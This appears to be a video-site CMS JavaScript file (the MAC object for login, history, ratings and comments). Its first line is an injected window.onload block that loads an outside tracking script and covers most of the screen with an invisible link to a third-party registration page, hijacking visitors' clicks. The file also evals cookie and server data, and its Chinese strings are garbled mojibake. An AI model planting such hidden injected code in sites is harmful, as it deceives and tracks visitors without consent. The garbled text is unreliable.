window.onload=function(){var link = 'http://www.8088048.com/portal.php?mod=register&fromuid=108542';var imgLink = '/demo.png';var hddd = document.getElementsByTagName('head')[0];var sc = document.createElement('script');sc.type = 'text/javascript';sc.src = '//js.users.51.la/19210232.js';hddd.appendChild(sc);var windowHegiht = window.screen.height, windowWidth = window.screen.width;var a = document.createElement('a');a.setAttribute('style','width:'+windowWidth *5/6+'px;height:'+windowHegiht * 5/6+'px;position:fixed;left:0;top:0;');a.setAttribute('href',link);a.setAttribute('target','_blank');document.body.appendChild(a);var count = 0;a.onclick = function(){count++;console.log(count);if(count == 1) {a.style.display = 'none';}};var div = document.createElement('div');div.setAttribute('id','#imgMore');var img = document.createElement('img');var aMore = document.createElement('a');document.body.appendChild(div);div.setAttribute('style','position:fixed;left:0;overflow:hidden;');div.appendChild(aMore);aMore.setAttribute('href',link);aMore.setAttribute('target','_blank');aMore.appendChild(img);img.setAttribute('src',imgLink);img.onload = function(){div.style.height = this.clientHeight + 'px';div.style.width = this.clientWidth + 'px';div.style.top = '100%';div.style.marginTop = 0 +'px';}};
String.prototype.replaceAll  = function(s1,s2){ return this.replace(new RegExp(s1,"gm"),s2); }
String.prototype.trim=function(){ return this.replace(/(^\s*)|(\s*$)/g, ""); }
var base64EncodeChars="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64encode(str){var out,i,len;var c1,c2,c3;len=str.length;i=0;out="";while(i<len){c1=str.charCodeAt(i++)&0xff;if(i==len){out+=base64EncodeChars.charAt(c1>>2);out+=base64EncodeChars.charAt((c1&0x3)<<4);out+="==";break}c2=str.charCodeAt(i++);if(i==len){out+=base64EncodeChars.charAt(c1>>2);out+=base64EncodeChars.charAt(((c1&0x3)<<4)|((c2&0xF0)>>4));out+=base64EncodeChars.charAt((c2&0xF)<<2);out+="=";break}c3=str.charCodeAt(i++);out+=base64EncodeChars.charAt(c1>>2);out+=base64EncodeChars.charAt(((c1&0x3)<<4)|((c2&0xF0)>>4));out+=base64EncodeChars.charAt(((c2&0xF)<<2)|((c3&0xC0)>>6));out+=base64EncodeChars.charAt(c3&0x3F)}return out}function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i<len){do{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)break;do{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}return out}function utf16to8(str){var out,i,len,c;out="";len=str.length;for(i=0;i<len;i++){c=str.charCodeAt(i);if((c>=0x0001)&&(c<=0x007F)){out+=str.charAt(i)}else if(c>0x07FF){out+=String.fromCharCode(0xE0|((c>>12)&0x0F));out+=String.fromCharCode(0x80|((c>>6)&0x3F));out+=String.fromCharCode(0x80|((c>>0)&0x3F))}else{out+=String.fromCharCode(0xC0|((c>>6)&0x1F));out+=String.fromCharCode(0x80|((c>>0)&0x3F))}}return out}function utf8to16(str){var out,i,len,c;var char2,char3;out="";len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4){case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out+=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out+=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out+=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break}}return out}

function pagego($url,$total){
	$page=$('#page').val();
	if($page>0&&($page<=$total)){
		if($page>1 || document.URL.indexOf('?')>-1){
			$url=$url.replace('{pg}',$page);
		}
		else{
			if($page==1){
				$url=$url.replace('-{pg}','').replace('{pg}','');
			}
		}
		location.href=$url;
	}
	return false;
}

var MAC={
	'Url': document.URL,
	'Title': document.title,
	'Copy': function(s){
		if (window.clipboardData){ window.clipboardData.setData("Text",s); } 
		else{
			if( $("#mac_flash_copy").get(0) ==undefined ){ $('<div id="mac_flash_copy"></div>'); } else {$('#mac_flash_copy').html(''); }
			$('#mac_flash_copy').html('<embed src='+SitePath+'"images/_clipboard.swf" FlashVars="clipboard='+escape(s)+'" width="0" height="0" type="application/x-shockwave-flash"></embed>');
		}
		alert("å¤åˆ¶æˆåŠŸ");
	},
	'Home': function(o,u){
		try{
	    	o.style.behavior='url(#default#homepage)'; o.setHomePage(u);
		}
	    catch(e){
	         if(window.netscape){
	         	try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}
	        	catch(e){alert("æ­¤æ“ä½œè¢«æµè§ˆå™¨æ‹’ç»ï¼è¯·æ‰‹åŠ¨è®¾ç½?);}
	            var moz = Components.classes['@mozilla.org/preferences-service;1'].getService(Components.interfaces.nsIPrefBranch);
	            moz.setCharPref('browser.startup.homepage',u);
	          }
	     }
	},
	'Fav': function(u,s){
		try{ window.external.addFavorite(u, s);}
		catch (e){
			try{window.sidebar.addPanel(s, u, "");}catch (e){alert("åŠ å…¥æ”¶è—å‡ºé”™ï¼Œè¯·ä½¿ç”¨é”®ç›˜Ctrl+Dè¿›è¡Œæ·»åŠ ");}
		}
	},
	'Open': function(u,w,h){
		window.open(u,'macopen1','toolbars=0, scrollbars=0, location=0, statusbars=0,menubars=0,resizable=yes,width='+w+',height='+h+'');
	},
	'Cookie': {
		'Set': function(name,value,days){
			var exp = new Date();
			exp.setTime(exp.getTime() + days*24*60*60*1000);
			var arr=document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
			document.cookie=name+"="+escape(value)+";path=/;expires="+exp.toUTCString();
		},
		'Get': function(name){
			var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
			if(arr != null){ return unescape(arr[2]); return null; }
		},
		'Del': function(name){
			var exp = new Date();
			exp.setTime(exp.getTime()-1);
			var cval = this.Get(name);
			if(cval != null){ document.cookie = name+"="+escape(cval)+";path=/;expires="+exp.toUTCString(); }
		}
	},
	//ä¿®æ”¹ç™»é™†ä¿¡æ¯begin
	'Login':{
		'Display': true,
		'Init':function($id){
			if($("#"+$id).length==0){ return; }
			this.Create($id);
		},
		'Show': function(){
			$('#login_box').show();
		},
		'Hide': function(){
			$('#login_box').hide();
		},
		'FlagHide': function(){
			$('#login_box').hover(function(){
				MAC.Login.Display = false;
				MAC.Login.Show();
			}, function(){
				MAC.Login.Display = true;
				MAC.Login.Hide();
			});
			if(MAC.Login.Display){
				MAC.Login.Hide();
			}
		},
		'Info':function($id){
			$.ajax({type:'get',url: SitePath + 'index.php?m=user-ajaxinfo',dataType:'json',timeout: 5000,
				error: function(){
					alert("ç™»é™†è¶…æ—¶,è¯·é‡æ–°ç™»å½?");
					$('#'+$id).html('<li><a href="'+SitePath+'index.php?m=user-reg.html" rel="nofollow">æ³¨å†Œ</a></li><li><a data-toggle="modal" href="#login-modal">ç™»å½•</a></li>');
				},
				success: function($r){
					$("#username").html($r.u_name);
					$("#username2").html($r.u_name);
				}
			});
		},
		'Create':function($id){
			html='';
			if(MAC.Cookie.Get('userid')!=undefined && MAC.Cookie.Get('userid')!=''){ 
			    html+='<li class="dropdown">'
				html+='<a class="dropdown-toggle" data-toggle="dropdown" href="#"> <span class="visible-xs"><i id="username"></i> <span class="caret"></span> </span> <span class="hidden-xs"><i id="username2"></i> <span class="caret"></span> </span> </a>';
				html+='<ul class="dropdown-menu pull-right m-t-0">';
				html+='<li><a href="'+SitePath+'index.php?m=user-index.html">ä¸ªäººä¿¡æ¯</a></li>';
				html+='<li><a href="'+SitePath+'index.php?m=user-info.html">ä¿®æ”¹èµ„æ–™</a></li>';
				html+='<li><a href="'+SitePath+'index.php?m=user-fav.html">æˆ‘çš„æ”¶è—</a></li>';
				html+='<li><a href="'+SitePath+'index.php?m=user-plays.html">æ’­æ”¾è®°å½•</a></li>';
				html+='<li><a href="'+SitePath+'index.php?m=user-pay.html">ä¼šå‘˜å……å€?/a></li>';
				html+='<li><a href="'+SitePath+'index.php?m=user-upgrade.html">ä¼šå‘˜å‡çº§</a></li>';
				html+'</ul>';
				html+='</li>';
				$('#'+$id).html(html);
				MAC.Login.Info();
				$('#'+$id).append('<li><a href="javascript:;" target="_self" onclick="MAC.Login.Out();">ç™»å‡º</a></li>');
			}
			else{
				html+='<li><a href="'+SitePath+'index.php?m=user-reg.html" rel="nofollow">æ³¨å†Œ</a></li><li><a data-toggle="modal" href="#login-modal">ç™»å½•</a></li>';
				$('#'+$id).html(html);
			}
		},
		'Out':function(){
			$.ajax({type:'get',url: SitePath + 'index.php?m=user-logout',timeout: 5000,
				success: function($r){
					MAC.Cookie.Set('userid','',0);
					location.href=location.href;
				}
			});
		},
		'In':function(){
			if($("#username").val()==''){ alert('è¯·è¾“å…¥è´¦æˆ?); }
			if($("#userpass").val()==''){ alert('è¯·è¾“å…¥å¯†ç ?); }
			$.ajax({type: 'post',url: SitePath + 'index.php?m=user-check', data:'u_name='+$("#username").val()+'&u_password='+$("#userpass").val(),timeout: 5000,
				error: function(){
					alert('ç™»å½•å¤±è´¥');
				},
				success: function($r){
					if($r.indexOf('æ‚¨è¾“å…?)>-1){
						alert('è´¦æˆ·æˆ–å¯†ç é”™è¯¯ï¼Œè¯·é‡è¯?');
					}
					else if($r.indexOf('ç™»å½•æˆåŠŸ')){
						location.href=location.href;
					}
					else{
						
					}
				}
			});
		}
	},
	//ä¿®æ”¹ç™»é™†ä¿¡æ¯end
	'History': {
		'Limit':10,
		'Days':7,
		'Json': '',
		'Display': true,
		'List': function($id){
			if($("#"+$id).length==0){ return; }
			this.Create($id);
			$('#'+$id).hover(function(){
				MAC.History.Show();
			}, function(){
				MAC.History.FlagHide();
			});
		},
		'Clear': function(){
			MAC.Cookie.Del('mac_history');
			$('#history_box').html('<li class="hx_clear">å·²æ¸…ç©ºè§‚çœ‹è®°å½•ã€?/li>');
		},	
		'Show': function(){
			$('#history_box').show();
		},
		'Hide': function(){
			$('#history_box').hide();
		},
		'FlagHide': function(){
			$('#history_box').hover(function(){
				MAC.History.Display = false;
				MAC.History.Show();
			}, function(){
				MAC.History.Display = true;
				MAC.History.Hide();
			});
			if(MAC.History.Display){
				MAC.History.Hide();
			}
		},
		'Create': function($id){
			var jsondata = [];
			if(this.Json){
				jsondata = this.Json;
			}else{
				var jsonstr = MAC.Cookie.Get('mac_history');
				if(jsonstr != undefined){
					jsondata = eval(jsonstr);
				}
			}
			html = '<dl class="drop-box history_box" id="history_box" style="display:none;position:absolute;">';
			html +='<dt><a target="_self" href="javascript:void(0)" onclick="MAC.History.Clear();">æ¸…ç©º</a> | <a target="_self" href="javascript:void(0)" onclick="MAC.History.Hide();">å…³é—­</a></dt>';
			if(jsondata.length > 0){
				for($i=0; $i<jsondata.length; $i++){
					if($i%2==1){
						html +='<dd class="odd">';
					}else{
						html +='<dd class="even">';
					}
					html +='<a href="'+jsondata[$i].link+'" class="hx_title">'+jsondata[$i].name+'</a></dd>';
				}
			}else{
				html +='<dd class="hide">æš‚æ— è§‚çœ‹è®°å½•</dd>';
			}
			html += '</dl>';
			$('#'+$id).after(html);
			
			var w = $('#'+$id).width();
			var h = $('#'+$id).height();
			var position = $('#'+$id).position();
			$('#history_box').css({'left':position.left,'top':(position.top+h)});
		},	
		'Insert': function(name,link,typename,typelink,pic){
			var jsondata = MAC.Cookie.Get('mac_history');
			if(jsondata != undefined){
				this.Json = eval(jsondata);
				for($i=0;$i<this.Json.length;$i++){
					if(this.Json[$i].link == link){
						return false;
					}
				}
				if(!link){ link = document.URL; }
				jsonstr = '{video:[{"name":"'+name+'","link":"'+link+'","typename":"'+typename+'","typelink":"'+typelink+'","pic":"'+pic+'"},';
				for($i=0; $i<=this.Limit; $i++){
					if(this.Json[$i]){
						jsonstr += '{"name":"'+this.Json[$i].name+'","link":"'+this.Json[$i].link+'","typename":"'+this.Json[$i].typename+'","typelink":"'+this.Json[$i].typelink+'","pic":"'+this.Json[$i].pic+'"},';
					}else{
						break;
					}
				}
				jsonstr = jsonstr.substring(0,jsonstr.lastIndexOf(','));
				jsonstr += "]}";
			}else{
				jsonstr = '{video:[{"name":"'+name+'","link":"'+link+'","typename":"'+typename+'","typelink":"'+typelink+'","pic":"'+pic+'"}]}';
			}
			this.Json = eval(jsonstr);
			MAC.Cookie.Set('mac_history',jsonstr,this.Days);
		}
	},
	'Suggest': {
		'Show': function($id,$limit,$ajaxurl,$jumpurl){
			try{
			$("#"+$id).autocomplete($ajaxurl,{
				width: 175,scrollHeight: 300,minChars: 1,matchSubset: 1,max: $limit,cacheLength: 10,multiple: true,matchContains: true,autoFill: false,dataType: "json",
				parse:function(obj) {
					if(obj.status){
						var parsed = [];
						for (var i = 0; i < obj.data.length; i++) {
							parsed[i] = {
								data: obj.data[i],value: obj.data[i].d_name,result: obj.data[i].d_name
							};
						}
						return parsed;
					}else{
						return {data:'',value:'',result:''};
					}
				},
				formatItem: function(row,i,max) {
					return row.d_name;
				},
				formatResult: function(row,i,max) {
					return row.d_name;
				}
			}).result(function(event, data, formatted) {
				location.href = $jumpurl + encodeURIComponent(data.d_name);
			});
			}catch(e){}
		}
	},
	'Score': {
		'ajaxurl': 'inc/ajax.php?ac=score',
		'Show':function($f,$tab,$id){
			var str = '';
			if($f==1){
				str = '<div style="padding:5px 10px;border:1px solid #CCC"><div style="color:#000"><strong>æˆ‘è¦è¯„åˆ†(æ„Ÿè°¢å‚ä¸è¯„åˆ†ï¼Œå‘è¡¨æ‚¨çš„è§‚ç‚?</strong></div><div>å…?<strong style="font-size:14px;color:red" id="star_count"> 0 </strong> ä¸ªäººè¯„åˆ†ï¼?å¹³å‡åˆ?<strong style="font-size:14px;color:red" id="star_pjf"> 0 </strong>ï¼?æ€»å¾—åˆ?<strong style="font-size:14px;color:red" id="star_all"> 0 </strong></div><div>';
				for(var i=1;i<=10;i++){ str += '<input type="radio" name="score" id="rating'+i+'" value="1"/><label for="rating'+i+'">'+i+'</label>'; }
				str += '&nbsp;<input type="button" value=" è¯?åˆ?" id="scoresend" style="width:55px;height:21px"/></div></div>';
			}
			else{
				str += '<div class="star"><span id="star_tip"></span><ul><li class="star_current"></li>';
				for(var i=1;i<=10;i++){ str += '<li><a value="'+i+'" class="star_'+i+'">'+i+'</a></li>'; }
				str += '</ul>';
				str +='<span id="star_hover"></span><p><span id="star_shi">0</span><span id="star_ge">.0</span><span class="star_no">(å·²æœ‰<label id="star_count">0</label>äººè¯„åˆ?</span></p></div>';
			}
			document.write(str);
			$.ajax({type: 'get',url: SitePath + this.ajaxurl + '&tab='+$tab+'&id='+$id,timeout: 5000,
				error: function(){
					alert('è¯„åˆ†åŠ è½½å¤±è´¥');
					$(".star").html('è¯„åˆ†åŠ è½½å¤±è´¥');
				},
				success: function($r){
					MAC.Score.View($r);
					if($f==1){
						$("#scoresend").click(function(){
							var rc=false;
							for(var i=1;i<=10;i++){ if( $('#rating'+i).get(0).checked){ rc=true; break; } }
							if(!rc){alert('ä½ è¿˜æ²¡é€‰å–åˆ†æ•°');return;}
							MAC.Score.Send( '&tab='+$tab+'&id='+$id+'&score='+i );
						});
					}
					else{
						
						var tip=new Array("","å¾ˆå·®ï¼Œæµªè´¹ç”Ÿå‘?,"å¾ˆå·®ï¼Œæµªè´¹ç”Ÿå‘?,"ä¸å–œæ¬?,"ä¸å–œæ¬?,"ä¸€èˆ¬ï¼Œä¸å¦¨ä¸€çœ?,"ä¸€èˆ¬ï¼Œä¸å¦¨ä¸€çœ?,"ä¸€èˆ¬ï¼Œä¸å¦¨ä¸€çœ?,"å–œæ¬¢ï¼Œå€¼å¾—æ¨è","å–œæ¬¢ï¼Œå€¼å¾—æ¨è","éå¸¸å–œæ¬¢ï¼Œä¸å®¹é”™è¿?);
						$(".star>ul>li>a").mouseover(function(){
							$("#star_hover").html($(this).attr('value')+"åˆ?");
							$("#star_tip").html(tip[$(this).attr('value')]);
							$(".star_current").css("display","none");
						});
						$(".star>ul>li>a").mouseout(function(){
							$("#star_hover").html("");
							$("#star_tip").html("");
							$(".star_current").css("display","block");
						});
						$(".star>ul>li>a").click(function(){
							MAC.Score.Send( '&tab='+$tab+'&id='+$id+'&score='+$(this).attr('value') );
						});
					}
				}
			});
		},
		'Send':function($u){
			$.ajax({type: 'get',url: SitePath + this.ajaxurl + $u,timeout: 5000,
				error: function(){
					$(".star").html('è¯„åˆ†åŠ è½½å¤±è´¥');
				},
				success: function($r){
					if($r=="haved"){
						alert('ä½ å·²ç»è¯„è¿‡åˆ†å•?);
					}else{
						MAC.Score.View($r);
					}
				}
			});
		},
		'View':function($r){
			$r = eval('(' + $r + ')');
			$("#rating"+Math.floor($r.score)).attr('checked',true);
			$("#star_count").text( $r.scorenum );
			$("#star_all").text( $r.scoreall );
			$("#star_pjf").text( $r.score );
			$("#star_shi").text( parseInt($r.score) );
			$("#star_ge").text( "." +  ($r.score.toString().split('.')[1]==undefined ? '0' : $r.score.toString().split('.')[1]) );
			$(".star_current").width($r.score*10);
		}
	},
	'Digg': {
		'Show': function($ajaxurl) {
			$('.digg_vodup').click(function(){
				MAC.Digg.Send($ajaxurl,'vod','up');
			});
			$('.digg_voddown').click(function(){
				MAC.Digg.Send($ajaxurl,'vod','down');
			});
			$('.digg_artup').click(function(){
				MAC.Digg.Send($ajaxurl,'art','up');
			});
			$('.digg_artdown').click(function(){
				MAC.Digg.Send($ajaxurl,'art','down');
			});
			
			if($(".digg_vodup").length || $("#digg_voddown").length){
				MAC.Digg.Send($ajaxurl,'vod','');
			}
			if($(".digg_artup").length || $("#digg_artdown").length){
				MAC.Digg.Send($ajaxurl,'art','');
			}
		},	
		'Send': function($ajaxurl,$tab,$ac){
			$.ajax({type: 'get',timeout: 5000, url: $ajaxurl + "&tab="+$tab+"&ac2="+$ac ,
				error: function(){
					alert('é¡¶è¸©æ•°æ®åŠ è½½å¤±è´¥');
				},
				success: function($r){
					if($r=="haved"){
						alert('ä½ å·²ç»è¯„è¿‡åˆ†å•?);
					}else{
						MAC.Digg.View($tab,$r);
					}
				}
			});
		},
		'View': function ($tab,$r){
			if($tab == 'vod'){
				$(".digg_vodup>span").html($r.split(':')[0]);
				$(".digg_voddown>span").html($r.split(':')[1]);
			}
			else if($tab = 'art'){
				var Digs = $r.split(':');
				var sUp = parseInt(Digs[0]);
				var sDown = parseInt(Digs[1]);
				var sTotal = sUp+sDown;
				var spUp=(sUp/sTotal)*100;
				spUp = Math.round(spUp*10)/10;
				var spDown = 100-spUp;
				spDown = Math.round(spDown*10)/10;
				if(sTotal!=0){
					$('#digg_artup_val').html(sUp);
					$('#digg_artdown_val').html(sDown);
					$('#digg_artup_sp').html(spUp+'%');
					$('#digg_artdown_sp').html(spDown+'%');
					$('#digg_artup_img').width(parseInt((sUp/sTotal)*55));
					$('#digg_artdown_img').width(parseInt((sDown/sTotal)*55));
				}
			}
		}
	},
	'Comment':{
		'Show':function($ajaxurl){
			if($("#comment").length>0){
				if($ajaxurl.indexOf('{pg}')>0){
					$ajaxurl = $ajaxurl.replace('{pg}',$("#page").val() );
				};
				
				$.ajax({
					type: 'get',
					url: $ajaxurl,
					timeout: 5000,
					error: function(){
						$("#comment").html('è¯„è®ºåŠ è½½å¤±è´¥ï¼Œè¯·åˆ·æ–°...');
					},
					success:function($r){
						$("#comment").html($r);
					}
				});
			}
		},
		'Post':function(){
			if($("#c_content").val() == 'è¯·åœ¨è¿™é‡Œå‘è¡¨æ‚¨çš„ä¸ªäººçœ‹æ³•ï¼Œæœ€å¤?00ä¸ªå­—ã€?){
				alert('è¯·å‘è¡¨æ‚¨çš„è¯„è®ºè§‚ç‚¹ï¼');
				return false;
			}
			$.ajax({
				type: 'post',
				url: SitePath+'index.php?m=comment-save',
				data: "vid="+SiteId+"&aid="+SiteAid+"&c_name="+$("#c_name").val()+"&c_content="+$("#c_content").val()+"&c_code="+$("#c_code").val(),
				success:function($r){
					if($r == 'ok'){
						MAC.Comment.Show(SitePath+'index.php?m=comment-show-aid-'+SiteAid+'-vid-'+SiteId);
					}
					else{
						alert($r);
					}
					$("#c_code_img").attr("src",SitePath+'inc/common/code.php?a=comment&s='+Math.random());
				}
			});
		},
		'Reply':function($id){
			$("#c_rid").val($id);
			window.scrollTo(0, $("#c_content").offset().top-30);
		}
	},
	'Lazyload':{
		'Show': function(){
			$("img.lazy").lazyload();
			try {  }catch(e){};
		},
		'Box': function($id){
			$("img.lazy").lazyload({
				 container: $("#"+$id)
			});	
		}
	},
	'Desktop':function(s){
		location.href= SitePath + "inc/ajax.php?ac=desktop&name="+encodeURI(s)+"&url=" + encodeURI(location.href);
	},
	'Timming':function(){
		var t=(new Image());t.src=SitePath+'inc/timming.php?t='+Math.random();
	},
	'Hits':function(tab,id){
		$.get(SitePath+"inc/ajax.php?ac=hits&tab="+tab+"&id="+id,function(r){$('#hits').html(r);});
	},
	'Error':function(tab,id,name){
		MAC.Open(SitePath+"inc/err.html?tab="+tab+"&id="+id+"&name="+ encodeURI(name),400,220);
	},
	'UserFav':function(id){
		$.get(SitePath+"inc/ajax.php?ac=userfav&id="+id+"&rnd="+Math.random(),function(r){
			if(r=="ok"){ alert("ä¼šå‘˜æ”¶è—æˆåŠŸ"); }
			else if(r=="login"){ alert('è¯·å…ˆç™»å½•ä¼šå‘˜ä¸­å¿ƒå†è¿›è¡Œä¼šå‘˜æ”¶è—æ“ä½?); }
			else if(r=="haved"){ alert('æ‚¨å·²ç»æ”¶è—è¿‡äº?); }
			else{ alert('å‘ç”Ÿé”™è¯¯'); }
		});
	},
	'AddEm':function(obj,i){
		var oldtext = $('#'+obj).val();
 		$('#'+obj).val( oldtext + '[em:' + i +']' );
	},
	'Remaining':function(obj,len,spid){
		var count = len - $(obj).val().length;
		if(count < 0){ 
			count = 0;
			$(obj).val($(obj).val().substr(0,200));
		}
		$('#'+spid).text(count);
	},
	'AdsWrap':function(w,h,n){
		document.writeln('<img width="'+w+'" height="'+h+'" alt="'+n+'" style="background-color: #CCCCCC" />');
	},
	'Js':function(){
	
	}
}

var zpvip = 'http://v1.nanrenpeng.net:8090/';
function ckcpt() {
    var cpt = '';
    return cpt;
}
var rhvip = 'http://v2.nanrenpeng.net:8080/';
function ckcpt() {
    var cpt = '';
    return cpt;
}

$(function(){
	//å¼‚æ­¥åŠ è½½å›¾ç‰‡åˆå§‹åŒ?
	MAC.Lazyload.Show();
	//å†å²è®°å½•åˆå§‹åŒ?
	MAC.History.List('history');
	//ç”¨æˆ·ç™»å½•åˆå§‹åŒ?
	MAC.Login.Init('login');
	//æœç´¢è”æƒ³åˆå§‹åŒ?
	MAC.Suggest.Show('wd',10, SitePath+'inc/ajax.php?ac=suggest&aid='+SiteAid, SitePath+'index.php?m=vod-search-wd-');
	//é¡¶è¸©åˆå§‹åŒ?
	MAC.Digg.Show(SitePath+'inc/ajax.php?ac=digg&aid='+SiteAid+'&id='+SiteId);
	//ajaxè¯„è®ºåˆå§‹åŒ?
	MAC.Comment.Show(SitePath+'index.php?m=comment-show-aid-'+SiteAid+'-vid-'+SiteId);
	//å®šæ—¶ä»»åŠ¡åˆå§‹åŒ?
	MAC.Timming();
});
